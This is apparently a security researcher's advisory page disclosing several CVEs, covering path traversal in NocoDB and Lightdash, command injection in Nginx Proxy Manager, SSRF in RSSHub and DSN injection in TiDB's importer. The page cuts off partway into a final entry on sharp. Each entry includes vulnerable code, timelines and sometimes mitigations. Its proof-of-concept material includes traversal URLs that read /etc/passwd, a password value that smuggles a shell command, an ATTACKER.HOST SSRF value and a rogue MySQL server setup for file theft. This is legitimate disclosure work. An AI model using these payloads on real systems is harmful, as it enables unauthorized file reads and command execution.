<p>dw1’s Advisory (dwisiswant0)</p>
<h1 id="cve-2023-35843">CVE-2023-35843: Arbitrary File Read in NocoDB</h1>
<p>Published 2023-06-19.</p>
<h2 id="summary">Summary</h2>
<p>The NocoDB application version <= 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the <code class="language-plaintext highlighter-rouge">path</code> parameter of the <code class="language-plaintext highlighter-rouge">/download</code> route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.</p>
<h2 id="description">Description</h2>
<p>The <code class="language-plaintext highlighter-rouge">fileRead</code> function is responsible for serving attachment files from the server. This function takes the <code class="language-plaintext highlighter-rouge">path</code> parameter from the request URL, appends it to a fixed path, and then utilizes the <code class="language-plaintext highlighter-rouge">attachmentService</code> to retrieve the attachment file based on the provided path parameter.</p>
<h2 id="details">Details</h2>
<h3 id="fileread-function"><code class="language-plaintext highlighter-rouge">fileRead</code> Function</h3>
<p>File <a href="https://github.com/nocodb/nocodb/blob/6decfa2b20c28db9946bddce0bcb1442b683ecae/packages/nocodb/src/lib/controllers/attachment.ctl.ts#L62-L74"><code class="language-plaintext highlighter-rouge">/packages/nocodb/src/lib/controllers/attachment.ctl.ts:62-74</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nx">fileRead</span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">img</span><span class="p">,</span> <span class="nx">type</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">attachmentService</span><span class="p">.</span><span class="nx">fileRead</span><span class="p">({</span>
<span class="na">path</span><span class="p">:</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">nc</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">uploads</span><span class="dl">'</span><span class="p">,</span> <span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">?.[</span><span class="mi">0</span><span class="p">]),</span>
<span class="p">});</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">writeHead</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="nx">type</span> <span class="p">});</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">end</span><span class="p">(</span><span class="nx">img</span><span class="p">,</span> <span class="dl">'</span><span class="s1">binary</span><span class="dl">'</span><span class="p">);</span>
<span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When a request reaches this function, it builds the file path by joining the fixed segments <code class="language-plaintext highlighter-rouge">'nc', 'uploads'</code> with the value of <code class="language-plaintext highlighter-rouge">req.params?.[0]</code>. Because that parameter is joined as-is, the client decides where within the server’s directory structure the requested file is looked up.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>An attacker can exploit this vulnerability by crafting a URL whose path parameter contains directory traversal sequences such as <code class="language-plaintext highlighter-rouge">../</code>. With enough of these sequences, the attacker walks up the directory hierarchy and reads files outside the intended directory. In the steps to reproduce below, the attacker reads <code class="language-plaintext highlighter-rouge">/etc/passwd</code> by traversing up several levels from the <code class="language-plaintext highlighter-rouge">nc/uploads</code> directory.</p>
<h4 id="steps-to-reproduce">Steps to Reproduce</h4>
<p>Send a GET request to the following URL: <code class="language-plaintext highlighter-rouge">http://localhost/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd</code>.
The server responds with the contents of the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</p>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows an unauthenticated attacker to access sensitive files on the server, leading to potential information disclosure.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>12 Apr 2023: Vulnerability reported through the huntr.dev platform.</li>
<li>13 Apr 2023: The huntr team contacted the NocoDB team.</li>
<li>13 May 2023: Report went stale.</li>
<li>03 Jun 2023: Requested a CVE ID from the MITRE CNA.</li>
<li>19 Jun 2023: CVE-2023-35843 was assigned.</li>
<li>19 Jun 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/nocodb/nocodb/blob/6decfa2b20c28db9946bddce0bcb1442b683ecae/packages/nocodb/src/lib/controllers/attachment.ctl.ts#L62-L74"><code class="language-plaintext highlighter-rouge">/packages/nocodb/src/lib/controllers/attachment.ctl.ts:62-74</code></a></li>
</ul>
<h1 id="cve-2023-35844">CVE-2023-35844: Arbitrary File Read in Lightdash</h1>
<p>Published 2023-06-19.</p>
<h2 id="summary">Summary</h2>
<p>Lightdash version <= 0.506.4 is vulnerable to a path traversal attack, allowing an attacker to access arbitrary files on the server. This vulnerability can be exploited by appending directory traversal sequences to the image ID parameter of the Slack image endpoint, enabling the attacker to bypass access controls and read sensitive files on the server.</p>
<h2 id="description">Description</h2>
<p>The Slack image endpoint is designed to serve images that have been uploaded to Slack and subsequently saved on the Lightdash server. The endpoint takes an image ID as a parameter and returns the corresponding image file. The vulnerability lies in the way the server handles the image ID parameter, which is not properly sanitized or validated.</p>
<h2 id="details">Details</h2>
<h3 id="slack-router">Slack Router</h3>
<p>File <a href="https://github.com/lightdash/lightdash/blob/fe599f87f5bdfe05b4221f94dc25f4b180d0b7a7/packages/backend/src/routers/slackRouter.ts#L66-L71"><code class="language-plaintext highlighter-rouge">/packages/backend/src/routers/slackRouter.ts:66-71</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">slackRouter</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span>
<span class="dl">'</span><span class="s1">/image/:imageId</span><span class="dl">'</span><span class="p">,</span>
<span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">,</span> <span class="nx">next</span><span class="p">)</span> <span class="o">=></span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="kd">const</span> <span class="nx">filePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="dl">'</span><span class="s1">/tmp</span><span class="dl">'</span><span class="p">,</span> <span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">imageId</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nx">existsSync</span><span class="p">(</span><span class="nx">filePath</span><span class="p">))</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">error</span> <span class="o">=</span> <span class="s2">`This file </span><span class="p">${</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">imageId</span><span class="p">}</span><span class="s2"> doesn't exist on this server, this may be happening if you are running multiple containers or because files are not persisted. You can check out our docs to learn more on how to enable cloud storage: https://docs.lightdash.com/self-host/customize-deployment/configure-lightdash-to-use-external-object-storage`</span><span class="p">;</span>
<span class="k">throw</span> <span class="k">new</span> <span class="nx">NotFoundError</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">sendFile</span><span class="p">(</span><span class="nx">filePath</span><span class="p">);</span>
<span class="c1">// ...</span>
<span class="p">},</span>
<span class="p">);</span>
</code></pre></div></div>
<p>When a request is made to the <code class="language-plaintext highlighter-rouge">/image/:imageId</code> endpoint, the server constructs a file path by appending the <code class="language-plaintext highlighter-rouge">imageId</code> parameter to the <code class="language-plaintext highlighter-rouge">/tmp</code> directory, then uses that path to locate and serve the image file. The server does not sanitize or validate <code class="language-plaintext highlighter-rouge">imageId</code>, so the path is susceptible to traversal.</p>
<p>If the constructed file path does not exist on the server, a <code class="language-plaintext highlighter-rouge">NotFoundError</code> is thrown whose message states that the requested file does not exist. That message also tells the requester something about the server’s deployment (multiple containers, non-persisted files), which could aid an attacker in understanding the server’s configuration.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>To exploit the vulnerability, an attacker can utilize a <code class="language-plaintext highlighter-rouge">curl</code> command to send a malicious request to the server. The following command demonstrates the proof of concept:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="s2">"https://localhost/api/v1/slack/image/slack-image%2F..%2F..%2F..%2Fetc%2Fpasswd"</span>
</code></pre></div></div>
<p>In that command, the attacker manipulates the <code class="language-plaintext highlighter-rouge">imageId</code> parameter by appending <code class="language-plaintext highlighter-rouge">%2F..%2F..%2F..%2Fetc%2Fpasswd</code>. Each <code class="language-plaintext highlighter-rouge">%2F..</code> is the URL-encoded form of <code class="language-plaintext highlighter-rouge">/..</code>, a traversal sequence that steps outside the intended directory once the parameter is decoded and joined onto <code class="language-plaintext highlighter-rouge">/tmp</code>.</p>
<p>By chaining these sequences, the attacker climbs several directories and reads the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file.</p>
<h2 id="impact">Impact</h2>
<p>This vulnerability allows an unauthenticated attacker to access sensitive files on the server, leading to potential information disclosure.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>12 Apr 2023: Vulnerability reported through the huntr.dev platform.</li>
<li>14 Apr 2023: The huntr team contacted the Lightdash team.</li>
<li>15 Apr 2023: Silent fix rolled out in version <a href="https://github.com/lightdash/lightdash/releases/tag/0.510.3">0.510.3</a>.</li>
<li>03 Jun 2023: Requested a CVE ID from the MITRE CNA.</li>
<li>19 Jun 2023: CVE-2023-35844 was assigned.</li>
<li>19 Jun 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/lightdash/lightdash/blob/fe599f87f5bdfe05b4221f94dc25f4b180d0b7a7/packages/backend/src/routers/slackRouter.ts#L66-L71"><code class="language-plaintext highlighter-rouge">/packages/backend/src/routers/slackRouter.ts:66-71</code></a></li>
<li><a href="https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c">lightdash/lightdash@<code class="language-plaintext highlighter-rouge">fcc808c8</code></a></li>
<li><a href="https://github.com/lightdash/lightdash/releases/tag/0.510.3">https://github.com/lightdash/lightdash/releases/tag/0.510.3</a></li>
</ul>
<h1 id="cve-2023-23596">CVE-2023-23596: OS Command Injection in Nginx Proxy Manager</h1>
<p>Published 2023-01-20.</p>
<h2 id="description">Description</h2>
<p>Nginx Proxy Manager version <= 2.9.19 is vulnerable to OS command injection. When an access list is created, the back-end builds an <code class="language-plaintext highlighter-rouge">htpasswd</code> file from the supplied username and password. Both values are concatenated into a shell command string without any validation and passed directly to <code class="language-plaintext highlighter-rouge">exec</code>, potentially allowing an authenticated attacker to execute arbitrary commands on the system.</p>
<h2 id="details">Details</h2>
<h3 id="building-access-file">Building Access file</h3>
<p>File <a href="https://github.com/NginxProxyManager/nginx-proxy-manager/blob/4f10d129c20cc82494b95cc94b97f859dbd4b54d/backend/internal/access-list.js#L507-L513"><code class="language-plaintext highlighter-rouge">/backend/internal/access-list.js:507-513</code></a>:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="c1">// ...</span>
<span class="k">if</span> <span class="p">(</span><span class="k">typeof</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span> <span class="o">!==</span> <span class="dl">'</span><span class="s1">undefined</span><span class="dl">'</span> <span class="o">&&</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span><span class="p">.</span><span class="nx">length</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">logger</span><span class="p">.</span><span class="nx">info</span><span class="p">(</span><span class="dl">'</span><span class="s1">Adding: </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">username</span><span class="p">);</span>
<span class="nx">utils</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="dl">'</span><span class="s1">/usr/bin/htpasswd -b "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">htpasswd_file</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">" "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">username</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">" "</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">item</span><span class="p">.</span><span class="nx">password</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">"</span><span class="dl">'</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="cm">/*result*/</span><span class="p">)</span> <span class="o">=></span> <span class="p">{</span>
<span class="nx">next</span><span class="p">();</span>
<span class="p">})</span>
<span class="c1">// ...</span>
</code></pre></div></div>
<p>The vulnerability in the code snippet above is located in the <strong>build</strong> method, where <code class="language-plaintext highlighter-rouge">utils.exec()</code> is used to run the <code class="language-plaintext highlighter-rouge">/usr/bin/htpasswd</code> command. <strong>item.username</strong> and <strong>item.password</strong> are concatenated into the command string that creates the htpasswd file, and that string is passed to <code class="language-plaintext highlighter-rouge">utils.exec()</code>. Since the values are only wrapped in double quotes, an attacker can break out of the quoting and inject additional commands, potentially executing arbitrary commands on the system.</p>
<h3 id="proof-of-concept">Proof of Concept</h3>
<p>This proof of concept demonstrates how an attacker can exploit this vulnerability. It uses a <code class="language-plaintext highlighter-rouge">curl</code> command to send a POST request to the <code class="language-plaintext highlighter-rouge">/api/nginx/access-lists</code> endpoint for creating an access list.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>curl <span class="nt">-sX</span> POST http://TARGET.HOST/api/nginx/access-lists <span class="se">\</span>
<span class="o">></span> <span class="nt">-H</span> <span class="s2">"Authorization: Bearer </span><span class="k">${</span><span class="nv">JWT</span><span class="k">}</span><span class="s2">"</span> <span class="se">\</span>
<span class="o">></span> <span class="nt">--data-binary</span> <span class="s2">"@payload.json"</span>
</code></pre></div></div>
<p>The request includes a JSON Web Token (JWT) in the “Authorization” header to authenticate the request, and the payload of the request is taken from a <code class="language-plaintext highlighter-rouge">payload.json</code> file, which contains the JSON data for creating an access list, including the name of the list, the type of access control, and an array of items.</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"lorem-ipsum"</span><span class="p">,</span><span class="w">
</span><span class="nl">"satisfy_any"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
</span><span class="nl">"pass_auth"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="p">,</span><span class="w">
</span><span class="nl">"items"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="p">{</span><span class="w">
</span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"foo"</span><span class="p">,</span><span class="w">
</span><span class="nl">"password"</span><span class="p">:</span><span class="w"> </span><span class="s2">"bar</span><span class="se">\"</span><span class="s2">;touch </span><span class="se">\"</span><span class="s2">pwned"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"clients"</span><span class="p">:</span><span class="w"> </span><span class="p">[]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>In this example, the payload includes a single item with a username of <code class="language-plaintext highlighter-rouge">foo</code> and a password of <code class="language-plaintext highlighter-rouge">bar";touch "pwned</code>. When the request is sent, the server-side code processes the payload and inserts its <code class="language-plaintext highlighter-rouge">username</code> and <code class="language-plaintext highlighter-rouge">password</code> into the <code class="language-plaintext highlighter-rouge">htpasswd</code> command without any validation. The password closes the quoted argument and adds a second command, <code class="language-plaintext highlighter-rouge">touch "pwned"</code>, which the server executes and which creates an empty <code class="language-plaintext highlighter-rouge">pwned</code> file.</p>
<h2 id="impact">Impact</h2>
<p>By injecting arbitrary commands into the <code class="language-plaintext highlighter-rouge">htpasswd</code> command, an attacker can execute arbitrary commands on the server.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>20 May 2022: Vulnerability reported through the huntr.dev platform.</li>
<li>21 May 2022: The huntr team filed an <a href="https://github.com/nginxproxymanager/nginx-proxy-manager/issues/2063">open issue</a> to request a security contact.</li>
<li>17 Sep 2022: Report went stale.</li>
<li>14 Jan 2023: Requested a CVE ID from the MITRE CNA.</li>
<li>15 Jan 2023: CVE-2023-23596 was assigned.</li>
<li>20 Jan 2023: Advisory published.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/NginxProxyManager/nginx-proxy-manager/blob/4f10d129c20cc82494b95cc94b97f859dbd4b54d/backend/internal/access-list.js#L510">/backend/internal/access-list.js:510</a></li>
</ul>
<h1 id="cve-2023-22493">CVE-2023-22493: Server Side Request Forgery (SSRF) in RSSHub</h1>
<p>Published 2023-01-13.</p>
<h2 id="description">Description</h2>
<p>An attacker can exploit this vulnerability by sending a request to the affected routes with a malicious value in the host parameter. For example, an attacker who controls the ATTACKER.HOST domain can request an affected route with the value set to <code class="language-plaintext highlighter-rouge">ATTACKER.HOST%2F%23</code>.
<code class="language-plaintext highlighter-rouge">%2F</code> and <code class="language-plaintext highlighter-rouge">%23</code> are the URL-encoded forms of the forward slash (<code class="language-plaintext highlighter-rouge">/</code>) and the pound sign (<code class="language-plaintext highlighter-rouge">#</code>). Once the value is decoded and substituted into the base URL <em>(i.e. <code class="language-plaintext highlighter-rouge">https://${input}.defined.host</code>)</em>, the result is <code class="language-plaintext highlighter-rouge">https://ATTACKER.HOST/#.defined.host</code>: the fixed suffix ends up in the URL fragment and the host becomes the attacker’s. The server therefore sends its request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server. <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup></p>
<h2 id="impact">Impact</h2>
<p>An attacker could use this vulnerability to make the server send requests to internal or other servers and resources on the network, potentially gaining access to sensitive information that would not normally be reachable and amplifying the impact of the attack.</p>
<h2 id="mitigation">Mitigation</h2>
<p>To mitigate this vulnerability, validate the user-supplied value before concatenating it into a host name, so that it cannot carry characters that change the meaning of the URL. For example:</p>
<ol>
<li>Split the input string into an array of strings using the “<code class="language-plaintext highlighter-rouge">.</code>” character as the separator.</li>
<li>Check if each element in the array is a valid <em>(sub)</em>-domain. A subdomain name must meet <a href="https://www.ietf.org/rfc/rfc1034.txt">RFC 1034</a> criteria:
<ul>
<li>Be between 1 and 63 characters long.</li>
<li>Consist only of alphanumeric characters, and hyphens.</li>
<li>Not start or end with a hyphen (“<code class="language-plaintext highlighter-rouge">-</code>”).</li>
</ul>
</li>
</ol>
<p>Here’s an example of an approach with a validation function:</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">isValidHost</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">parts</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">.</span><span class="dl">'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">regex</span> <span class="o">=</span> <span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z0-9</span><span class="se">]([</span><span class="sr">a-zA-Z0-9</span><span class="se">\-]{0,61}[</span><span class="sr">a-zA-Z0-9</span><span class="se">])?</span><span class="sr">$/</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">parts</span><span class="p">.</span><span class="nx">every</span><span class="p">((</span><span class="nx">part</span><span class="p">)</span> <span class="o">=></span> <span class="nx">regex</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">part</span><span class="p">));</span>
<span class="p">}</span>
<span class="c1">// subd0main: true</span>
<span class="c1">// -subd0main: false</span>
<span class="c1">// sub-d0main: true</span>
<span class="c1">// subd0main-: false</span>
<span class="c1">// sub.d0main: true</span>
<span class="c1">// sub-.d0main: false</span>
<span class="c1">// s: true</span>
<span class="c1">// -: false</span>
<span class="c1">// 0: true</span>
<span class="c1">// s-: false</span>
<span class="c1">// s-u: true</span>
<span class="c1">// su: true</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">input</code> string is split into an array of parts using the <code class="language-plaintext highlighter-rouge">.split()</code> method, with <code class="language-plaintext highlighter-rouge">'.'</code> as the delimiter. This will give you an array of subdomains, such as <code class="language-plaintext highlighter-rouge">['some', 'sub', 'domain']</code> for the input <code class="language-plaintext highlighter-rouge">'some.sub.domain'</code>.</p>
<p>A regex pattern is defined to match the criteria above. It allows 1 to 63 characters per label (hyphens included), and requires the first and last characters to be a letter or a digit rather than a hyphen.</p>
<p>The <code class="language-plaintext highlighter-rouge">.every()</code> method is used to check if every element in the parts array satisfies the condition specified by the callback function. The callback function uses the <code class="language-plaintext highlighter-rouge">.test()</code> method of the RegExp object to test if each element matches the regular expression. If all elements in the array pass the test, the <code class="language-plaintext highlighter-rouge">.every()</code> method will return <strong>true</strong>. If any element fails the test, the <code class="language-plaintext highlighter-rouge">.every()</code> method will return <strong>false</strong>.</p>
<p>The function above handles multi-level (dotted) subdomains. For a single-level label there is no need to split the <code class="language-plaintext highlighter-rouge">input</code> with <code class="language-plaintext highlighter-rouge">.split()</code>; the regular expression can be applied to the whole string directly.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">isValidHost</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">regex</span> <span class="o">=</span> <span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z0-9</span><span class="se">]([</span><span class="sr">a-zA-Z0-9</span><span class="se">\-]{0,61}[</span><span class="sr">a-zA-Z0-9</span><span class="se">])?</span><span class="sr">$/</span><span class="p">;</span>
<span class="k">return</span> <span class="nx">regex</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">input</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>See reference<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup> for the details.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>09 Jan 2023: Vulnerability reported to codeowner.</li>
<li>10 Jan 2023: Vulnerability acknowledged.</li>
<li>10 Jan 2023: Patch rolled out. [<sup id="fnref:2:1" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>]</li>
<li>12 Jan 2023: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://github.com/advisories/GHSA-64wp-jh9p-5cg2">GHSA-64wp-jh9p-5cg2</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://github.com/DIYgod/RSSHub/pull/11588">DIYgod/RSSHub#11588</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> <a href="#fnref:2:1" class="reversefootnote" role="doc-backlink">↩<sup>2</sup></a></p>
</li>
</ol>
</div>
<h1 id="cve-2022-3023">CVE-2022-3023: DSN Injection in TiDB Server Importer</h1>
<p>Published 2022-11-21.</p>
<h2 id="description">Description</h2>
<p>TiDB server (importer CLI tool) prior to versions 6.4.0 and 6.1.3 is vulnerable to data source name (DSN) injection. The database name used when generating and inserting data is not properly sanitized, which can lead to arbitrary file reads.</p>
<h2 id="vulnerable-snippet">Vulnerable snippet</h2>
<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/importer/db.go:320-328</span>
<span class="k">func</span> <span class="n">createDB</span><span class="p">(</span><span class="n">cfg</span> <span class="n">DBConfig</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">sql</span><span class="o">.</span><span class="n">DB</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
<span class="n">dbDSN</span> <span class="o">:=</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"%s:%s@tcp(%s:%d)/%s?charset=utf8"</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">User</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Password</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Host</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Port</span><span class="p">,</span> <span class="n">cfg</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
<span class="n">db</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sql</span><span class="o">.</span><span class="n">Open</span><span class="p">(</span><span class="s">"mysql"</span><span class="p">,</span> <span class="n">dbDSN</span><span class="p">)</span>
<span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
<span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">errors</span><span class="o">.</span><span class="n">Trace</span><span class="p">(</span><span class="n">err</span><span class="p">)</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">db</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>The TiDB server importer uses the <a href="https://github.com/go-sql-driver/mysql">Go MySQL Driver</a> to connect to MySQL servers, and the driver has built-in protection against <code class="language-plaintext highlighter-rouge">LOCAL INFILE</code> query requests.</p>
<p>To have the client hand over the requested file, the <strong>allowAllFiles</strong> parameter must be set to <strong>true</strong> in the DSN string used to connect to the MySQL server.</p>
<p>Let’s set up a vulnerable environment with TiDB server version 6.3.0.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>git clone https://github.com/pingcap/tidb <span class="nt">-b</span> v6.3.0 <span class="nt">--depth</span> 1
<span class="nv">$ </span><span class="nb">cd </span>tidb/cmd/importer
<span class="nv">$ </span>go build <span class="nb">.</span>
</code></pre></div></div>
<p>Set up a fake MySQL server that asks the connecting client for files, using the <a href="https://github.com/allyshka/Rogue-MySql-Server">Rogue-MySql-Server</a> script by <a href="https://github.com/allyshka">@allyshka</a>.
Run it and enter the path of the file you’re interested in.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>wget <span class="nt">-q</span> https://github.com/allyshka/Rogue-MySql-Server/raw/master/roguemysql.php
<span class="nv">$ </span>php roguemysql.php
</code></pre></div></div>
<p>Specify our server address in the <code class="language-plaintext highlighter-rouge">config.toml</code> file.</p>
<div class="language-toml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cmd/importer/config.toml:33-38</span>
<span class="nn">[db]</span>
<span class="py">host</span> <span class="p">=</span> <span class="s">"127.0.0.1"</span>
<span class="py">user</span> <span class="p">=</span> <span class="s">"root"</span>
<span class="py">password</span> <span class="p">=</span> <span class="s">""</span>
<span class="py">name</span> <span class="p">=</span> <span class="s">"test?allowAllFiles=true&"</span>
<span class="py">port</span> <span class="p">=</span> <span class="mi">3306</span>
</code></pre></div></div>
<p>Execute the <code class="language-plaintext highlighter-rouge">importer</code> command with the previously defined config file.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./importer <span class="nt">-config</span> config.toml
</code></pre></div></div>
<p><img src="https://i.ibb.co/YjcR9yf/image.png" alt="" /></p>
<p>The TiDB importer has connected to the rogue MySQL server, which has requested the <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file to be read, and the TiDB importer has transferred this file’s contents to us!</p>
<h2 id="impact">Impact</h2>
<p>This issue leads to arbitrary file read.</p>
<h2 id="mitigation">Mitigation</h2>
<p>Upgrade TiDB Server to version >= 6.4.0.</p>
<h2 id="timeline">Timeline</h2>
<ul>
<li>26 Dec 2021: Vulnerability reported through huntr.dev.</li>
<li>28 Dec 2021: huntr team contacted TiDB security team.</li>
<li>04 Jan 2022: Report & vulnerability acknowledged.</li>
<li>19 Oct 2022: Vulnerability fixed.</li>
<li>17 Nov 2022: Patch version rolled out.</li>
<li>21 Nov 2022: Vulnerability disclosed.</li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://huntr.dev/bounties/120f1346-e958-49d0-b66c-0f889a469540/">https://huntr.dev/bounties/120f1346-e958-49d0-b66c-0f889a469540/</a></li>
<li><a href="https://github.com/pingcap/tidb/commit/d0376379d615cc8f263a0b17c031ce403c8dcbfb">pingcap/tidb@<code class="language-plaintext highlighter-rouge">d0376379</code></a></li>
</ul>
<p>Author: dwisiswant0</p>
<h1>CVE-2022-29256: OS Command Injection in sharp</h1>
<p>Published 2022-05-25. Permalink: <a href="/CVE-2022-29256">/CVE-2022-29256</a></p>
<h2 id="description">Description</h2>
<p>sharp prior to version 0.30.4 is vulnerable to OS command injection. The <code class="language-plaintext highlighter-rouge">PKG_CONFIG_PATH</code> environment variable is used to check the version of the pre-built dependency; its value is concatenated into a shell command string without any validation and passed to the <code class="language-plaintext highlighter-rouge">spawnSync</code> method during the package’s post-installation step.</p>
<h2 id="vulnerable-snippet">Vulnerable snippet</h2>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// lib/libvips.js</span>
<span class="mi">66</span><span class="p">:</span> <span class="kd">const</span> <span class="nx">globalLibvipsVersion</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
